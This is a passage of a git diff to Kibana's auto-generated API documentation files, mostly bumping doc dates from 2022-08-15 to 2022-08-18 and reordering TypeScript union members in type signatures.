"packages/kbn-tooling-log/src/tooling_log_text_writer.ts", "deprecated": false @@ -1228,7 +1228,7 @@ "label": "LogLevel", "description": [], "signature": [ - "\"error\" | \"success\" | \"warning\" | \"info\" | \"debug\" | \"silent\" | \"verbose\"" + "\"error\" | \"warning\" | \"success\" | \"info\" | \"debug\" | \"silent\" | \"verbose\"" ], "path": "packages/kbn-tooling-log/src/log_levels.ts", "deprecated": false, 
@@ -1242,7 +1242,7 @@ "label": "ParsedLogLevel", "description": [], "signature": [ - "{ name: \"error\" | \"success\" | \"warning\" | \"info\" | \"debug\" | \"silent\" | \"verbose\"; flags: { error: boolean; success: boolean; warning: boolean; info: boolean; debug: boolean; silent: boolean; verbose: boolean; }; }" + "{ name: \"error\" | \"warning\" | \"success\" | \"info\" | \"debug\" | \"silent\" | \"verbose\"; flags: { error: boolean; warning: boolean; success: boolean; info: boolean; debug: boolean; silent: boolean; verbose: boolean; }; }" ], "path": "packages/kbn-tooling-log/src/log_levels.ts", "deprecated": false, diff --git a/api_docs/kbn_tooling_log.mdx b/api_docs/kbn_tooling_log.mdx index 12a78a81362d2..78ef107edb774 100644 --- a/api_docs/kbn_tooling_log.mdx +++ b/api_docs/kbn_tooling_log.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-tooling-log title: "@kbn/tooling-log" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/tooling-log plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/tooling-log'] --- import kbnToolingLogObj from './kbn_tooling_log.devdocs.json'; diff --git a/api_docs/kbn_type_summarizer.mdx b/api_docs/kbn_type_summarizer.mdx index be0253bede2db..7e332d5da7689 100644 --- a/api_docs/kbn_type_summarizer.mdx +++ b/api_docs/kbn_type_summarizer.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-type-summarizer title: "@kbn/type-summarizer" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/type-summarizer plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/type-summarizer'] --- import kbnTypeSummarizerObj from './kbn_type_summarizer.devdocs.json'; diff --git a/api_docs/kbn_type_summarizer_core.mdx b/api_docs/kbn_type_summarizer_core.mdx index f49ff71456fa4..74df26f8d9add 100644 --- a/api_docs/kbn_type_summarizer_core.mdx +++ b/api_docs/kbn_type_summarizer_core.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-type-summarizer-core title: "@kbn/type-summarizer-core" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/type-summarizer-core plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/type-summarizer-core'] --- import kbnTypeSummarizerCoreObj from './kbn_type_summarizer_core.devdocs.json'; diff --git a/api_docs/kbn_typed_react_router_config.mdx b/api_docs/kbn_typed_react_router_config.mdx index 496004802bc86..451e189b0fc16 100644 --- a/api_docs/kbn_typed_react_router_config.mdx +++ b/api_docs/kbn_typed_react_router_config.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-typed-react-router-config title: "@kbn/typed-react-router-config" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/typed-react-router-config plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/typed-react-router-config'] --- import kbnTypedReactRouterConfigObj from './kbn_typed_react_router_config.devdocs.json'; diff --git a/api_docs/kbn_ui_theme.mdx b/api_docs/kbn_ui_theme.mdx index 796ef0d53687f..832bc8a26b0df 100644 --- a/api_docs/kbn_ui_theme.mdx +++ b/api_docs/kbn_ui_theme.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-ui-theme title: "@kbn/ui-theme" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/ui-theme plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/ui-theme'] --- import kbnUiThemeObj from './kbn_ui_theme.devdocs.json'; diff --git a/api_docs/kbn_user_profile_components.devdocs.json b/api_docs/kbn_user_profile_components.devdocs.json index ee6fa83b35cdf..5ef1677f7275b 100644 --- a/api_docs/kbn_user_profile_components.devdocs.json +++ b/api_docs/kbn_user_profile_components.devdocs.json 
@@ -187,7 +187,7 @@ }, " extends Omit<", "EuiAvatarProps", - ", \"type\" | \"color\" | \"name\" | \"iconColor\" | \"iconType\" | \"iconSize\" | \"initials\" | \"initialsLength\" | \"imageUrl\">" + ", \"type\" | \"color\" | \"iconColor\" | \"name\" | \"iconType\" | \"iconSize\" | \"initials\" | \"initialsLength\" | \"imageUrl\">" ], "path": "packages/kbn-user-profile-components/src/user_avatar.tsx", "deprecated": false, diff --git a/api_docs/kbn_user_profile_components.mdx b/api_docs/kbn_user_profile_components.mdx index 6261432bfc020..08dc739f77a14 100644 --- a/api_docs/kbn_user_profile_components.mdx +++ b/api_docs/kbn_user_profile_components.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-user-profile-components title: "@kbn/user-profile-components" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/user-profile-components plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/user-profile-components'] --- import kbnUserProfileComponentsObj from './kbn_user_profile_components.devdocs.json'; diff --git a/api_docs/kbn_utility_types.mdx b/api_docs/kbn_utility_types.mdx index 2b1eb35f16ff6..88696704bddb7 100644 --- a/api_docs/kbn_utility_types.mdx +++ b/api_docs/kbn_utility_types.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-utility-types title: "@kbn/utility-types" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/utility-types plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/utility-types'] --- import kbnUtilityTypesObj from './kbn_utility_types.devdocs.json'; diff --git a/api_docs/kbn_utility_types_jest.mdx b/api_docs/kbn_utility_types_jest.mdx index c3de040d1aef6..b564685326479 100644 --- a/api_docs/kbn_utility_types_jest.mdx +++ b/api_docs/kbn_utility_types_jest.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-utility-types-jest title: "@kbn/utility-types-jest" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/utility-types-jest plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/utility-types-jest'] --- import kbnUtilityTypesJestObj from './kbn_utility_types_jest.devdocs.json'; diff --git a/api_docs/kbn_utils.mdx b/api_docs/kbn_utils.mdx index 6400d3ce77063..906b61b007483 100644 --- a/api_docs/kbn_utils.mdx +++ b/api_docs/kbn_utils.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-utils title: "@kbn/utils" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/utils plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/utils'] --- import kbnUtilsObj from './kbn_utils.devdocs.json'; diff --git a/api_docs/kbn_yarn_lock_validator.mdx b/api_docs/kbn_yarn_lock_validator.mdx index 183df3e3c8eb4..d9202415378fe 100644 --- a/api_docs/kbn_yarn_lock_validator.mdx +++ b/api_docs/kbn_yarn_lock_validator.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-yarn-lock-validator title: "@kbn/yarn-lock-validator" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/yarn-lock-validator plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/yarn-lock-validator'] --- import kbnYarnLockValidatorObj from './kbn_yarn_lock_validator.devdocs.json'; diff --git a/api_docs/kibana_overview.mdx b/api_docs/kibana_overview.mdx index e65cbc7e6959d..a66ba46c615b8 100644 --- a/api_docs/kibana_overview.mdx +++ b/api_docs/kibana_overview.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kibanaOverview title: "kibanaOverview" image: https://source.unsplash.com/400x175/?github description: API docs for the kibanaOverview plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'kibanaOverview'] --- import kibanaOverviewObj from './kibana_overview.devdocs.json'; diff --git a/api_docs/kibana_react.devdocs.json b/api_docs/kibana_react.devdocs.json index 220e36cce7cf0..986f60b1bff13 100644 --- a/api_docs/kibana_react.devdocs.json +++ b/api_docs/kibana_react.devdocs.json @@ -1820,30 +1820,6 @@ "plugin": "fleet", "path": "x-pack/plugins/fleet/public/components/custom_assets_accordion.tsx" }, - { - "plugin": "visualizations", - "path": "src/plugins/visualizations/public/visualize_app/utils/get_table_columns.tsx" - }, - { - "plugin": "visualizations", - "path": "src/plugins/visualizations/public/visualize_app/utils/get_table_columns.tsx" - }, - { - "plugin": "visualizations", - "path": "src/plugins/visualizations/public/visualize_app/utils/get_table_columns.tsx" - }, - { - "plugin": "lens", - "path": "x-pack/plugins/lens/public/editor_frame_service/editor_frame/workspace_panel/workspace_panel.tsx" - }, - { - "plugin": "lens", - "path": "x-pack/plugins/lens/public/editor_frame_service/editor_frame/workspace_panel/workspace_panel.tsx" - }, - { - "plugin": "lens", - "path": "x-pack/plugins/lens/public/editor_frame_service/editor_frame/workspace_panel/workspace_panel.tsx" - }, { "plugin": "observability", "path": "x-pack/plugins/observability/public/application/index.tsx" 
@@ -4034,7 +4010,7 @@ "signature": [ "Omit<", "EuiPageProps", - ", \"paddingSize\"> & { template?: \"default\" | \"empty\" | \"centeredBody\" | \"centeredContent\" | undefined; paddingSize?: \"none\" | \"s\" | \"m\" | \"l\" | undefined; pageSideBar?: React.ReactNode; pageSideBarProps?: ", + ", \"paddingSize\"> & { template?: \"default\" | \"empty\" | \"centeredBody\" | \"centeredContent\" | undefined; paddingSize?: \"none\" | \"m\" | \"s\" | \"l\" | undefined; pageSideBar?: React.ReactNode; pageSideBarProps?: ", "EuiPageSideBarProps", " | undefined; pageHeader?: ", "EuiPageHeaderProps", diff --git a/api_docs/kibana_react.mdx b/api_docs/kibana_react.mdx index 41fd6d926039c..dce8d8401c82e 100644 --- a/api_docs/kibana_react.mdx +++ b/api_docs/kibana_react.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kibanaReact title: "kibanaReact" image: https://source.unsplash.com/400x175/?github description: API docs for the kibanaReact plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'kibanaReact'] --- import kibanaReactObj from './kibana_react.devdocs.json'; diff --git a/api_docs/kibana_utils.devdocs.json b/api_docs/kibana_utils.devdocs.json index 3839c7eb3e7c4..5e09ebc028a86 100644 --- a/api_docs/kibana_utils.devdocs.json +++ b/api_docs/kibana_utils.devdocs.json @@ -6623,7 +6623,7 @@ "signature": [ "(history: Pick<", "History", - ", \"replace\" | \"location\">) => void" + ", \"location\" | \"replace\">) => void" ], "path": "src/plugins/kibana_utils/public/plugin.ts", "deprecated": false, @@ -6638,7 +6638,7 @@ "signature": [ "Pick<", "History", - ", \"replace\" | \"location\">" + ", \"location\" | \"replace\">" ], "path": "src/plugins/kibana_utils/public/plugin.ts", "deprecated": false, diff --git a/api_docs/kibana_utils.mdx b/api_docs/kibana_utils.mdx index 18745d1c7c935..cba11c205cd12 100644 --- a/api_docs/kibana_utils.mdx +++ b/api_docs/kibana_utils.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kibanaUtils title: "kibanaUtils" image: https://source.unsplash.com/400x175/?github description: API docs for the kibanaUtils plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'kibanaUtils'] --- import kibanaUtilsObj from './kibana_utils.devdocs.json'; diff --git a/api_docs/kubernetes_security.mdx b/api_docs/kubernetes_security.mdx index 17bba5735a1be..f15b9c6bfb7c3 100644 --- a/api_docs/kubernetes_security.mdx +++ b/api_docs/kubernetes_security.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kubernetesSecurity title: "kubernetesSecurity" image: https://source.unsplash.com/400x175/?github description: API docs for the kubernetesSecurity plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'kubernetesSecurity'] --- import kubernetesSecurityObj from './kubernetes_security.devdocs.json'; diff --git a/api_docs/lens.devdocs.json b/api_docs/lens.devdocs.json index 11b085917260d..4746d5f7c2957 100644 --- a/api_docs/lens.devdocs.json +++ b/api_docs/lens.devdocs.json @@ -1235,7 +1235,7 @@ "label": "xScaleType", "description": [], "signature": [ - "\"time\" | \"linear\" | \"ordinal\"" + "\"linear\" | \"time\" | \"ordinal\"" ], "path": "src/plugins/chart_expressions/expression_xy/common/types/expression_functions.ts", "deprecated": false @@ -1302,7 +1302,13 @@ "label": "decorations", "description": [], "signature": [ - "DataDecorationConfigResult", + { + "pluginId": "expressionXY", + "scope": "common", + "docId": "kibExpressionXYPluginApi", + "section": "def-common.DataDecorationConfigResult", + "text": "DataDecorationConfigResult" + }, "[] | undefined" ], "path": "src/plugins/chart_expressions/expression_xy/common/types/expression_functions.ts", 
@@ -3779,7 +3785,7 @@ "\nThe change type indicates what was changed in this table compared to the currently active table of this layer." ], "signature": [ - "\"initial\" | \"layers\" | \"unchanged\" | \"reduced\" | \"extended\" | \"reorder\"" + "\"layers\" | \"initial\" | \"unchanged\" | \"reduced\" | \"extended\" | \"reorder\"" ], "path": "x-pack/plugins/lens/public/types.ts", "deprecated": false @@ -3835,7 +3841,7 @@ "label": "params", "description": [], "signature": [ - "{ size: number; accuracyMode?: boolean | undefined; include?: number[] | string[] | undefined; exclude?: number[] | string[] | undefined; includeIsRegex?: boolean | undefined; excludeIsRegex?: boolean | undefined; orderBy: { type: \"alphabetical\"; fallback?: boolean | undefined; } | { type: \"rare\"; maxDocCount: number; } | { type: \"column\"; columnId: string; } | { type: \"custom\"; }; orderAgg?: ", + "{ size: number; accuracyMode?: boolean | undefined; include?: string[] | number[] | undefined; exclude?: string[] | number[] | undefined; includeIsRegex?: boolean | undefined; excludeIsRegex?: boolean | undefined; orderBy: { type: \"alphabetical\"; fallback?: boolean | undefined; } | { type: \"rare\"; maxDocCount: number; } | { type: \"column\"; columnId: string; } | { type: \"custom\"; }; orderAgg?: ", { "pluginId": "lens", "scope": "public", @@ -7921,7 +7927,7 @@ "label": "XScaleType", "description": [], "signature": [ - "\"time\" | \"linear\" | \"ordinal\"" + "\"linear\" | \"time\" | \"ordinal\"" ], "path": "src/plugins/chart_expressions/expression_xy/common/types/expression_functions.ts", "deprecated": false, @@ -7999,7 +8005,7 @@ "label": "YScaleType", "description": [], "signature": [ - "\"log\" | \"time\" | \"linear\" | \"sqrt\"" + "\"linear\" | \"log\" | \"time\" | \"sqrt\"" ], "path": "src/plugins/chart_expressions/expression_xy/common/types/expression_functions.ts", "deprecated": false, 
@@ -9115,7 +9121,7 @@ "label": "OperationTypePost712", "description": [], "signature": [ - "\"min\" | \"max\" | \"sum\" | \"filters\" | \"count\" | \"date_histogram\" | \"percentile\" | \"average\" | \"range\" | \"terms\" | \"median\" | \"cumulative_sum\" | \"moving_average\" | \"unique_count\" | \"last_value\" | \"counter_rate\" | \"differences\"" + "\"range\" | \"min\" | \"max\" | \"filters\" | \"count\" | \"date_histogram\" | \"percentile\" | \"sum\" | \"average\" | \"terms\" | \"median\" | \"cumulative_sum\" | \"moving_average\" | \"unique_count\" | \"last_value\" | \"counter_rate\" | \"differences\"" ], "path": "x-pack/plugins/lens/server/migrations/types.ts", "deprecated": false, @@ -9129,7 +9135,7 @@ "label": "OperationTypePre712", "description": [], "signature": [ - "\"min\" | \"max\" | \"sum\" | \"filters\" | \"count\" | \"date_histogram\" | \"percentile\" | \"range\" | \"terms\" | \"avg\" | \"median\" | \"cumulative_sum\" | \"derivative\" | \"moving_average\" | \"last_value\" | \"counter_rate\" | \"cardinality\"" + "\"range\" | \"min\" | \"max\" | \"filters\" | \"count\" | \"date_histogram\" | \"percentile\" | \"sum\" | \"terms\" | \"avg\" | \"median\" | \"cumulative_sum\" | \"derivative\" | \"moving_average\" | \"last_value\" | \"counter_rate\" | \"cardinality\"" ], "path": "x-pack/plugins/lens/server/migrations/types.ts", "deprecated": false, diff --git a/api_docs/lens.mdx b/api_docs/lens.mdx index 3aa633d49f67d..80f60ed7d605e 100644 --- a/api_docs/lens.mdx +++ b/api_docs/lens.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/lens title: "lens" image: https://source.unsplash.com/400x175/?github description: API docs for the lens plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'lens'] --- import lensObj from './lens.devdocs.json'; diff --git a/api_docs/license_api_guard.mdx b/api_docs/license_api_guard.mdx index b19b1f57bf2d4..0ca74c7edafa8 100644 --- a/api_docs/license_api_guard.mdx 
+++ b/api_docs/license_api_guard.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/licenseApiGuard title: "licenseApiGuard" image: https://source.unsplash.com/400x175/?github description: API docs for the licenseApiGuard plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'licenseApiGuard'] --- import licenseApiGuardObj from './license_api_guard.devdocs.json'; diff --git a/api_docs/license_management.mdx b/api_docs/license_management.mdx index a62273cd270eb..8147033607189 100644 --- a/api_docs/license_management.mdx +++ b/api_docs/license_management.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/licenseManagement title: "licenseManagement" image: https://source.unsplash.com/400x175/?github description: API docs for the licenseManagement plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'licenseManagement'] --- import licenseManagementObj from './license_management.devdocs.json'; diff --git a/api_docs/licensing.mdx b/api_docs/licensing.mdx index 5b2c54cf229de..dc71276bb7c66 100644 --- a/api_docs/licensing.mdx +++ b/api_docs/licensing.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/licensing title: "licensing" image: https://source.unsplash.com/400x175/?github description: API docs for the licensing plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'licensing'] --- import licensingObj from './licensing.devdocs.json'; diff --git a/api_docs/lists.devdocs.json b/api_docs/lists.devdocs.json index 6dc92b34341c1..5d10e9c1761df 100644 --- a/api_docs/lists.devdocs.json +++ b/api_docs/lists.devdocs.json 
@@ -311,7 +311,7 @@ "label": "exceptionItems", "description": [], "signature": [ - "({ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | ({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | 
\"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }))[]" + "({ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | 
\"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | ({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; 
})[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }))[]" ], "path": "x-pack/plugins/lists/public/exceptions/components/builder/exception_items_renderer.tsx", "deprecated": false 
@@ -324,7 +324,7 @@ "label": "exceptionsToDelete", "description": [], "signature": [ - "{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[]" + "{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: 
string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[]" ], "path": "x-pack/plugins/lists/public/exceptions/components/builder/exception_items_renderer.tsx", "deprecated": false 
@@ -585,7 +585,7 @@ "signature": [ "({ itemId, id, namespaceType, }: ", "GetExceptionListItemOptions", - ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | null>" + ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; 
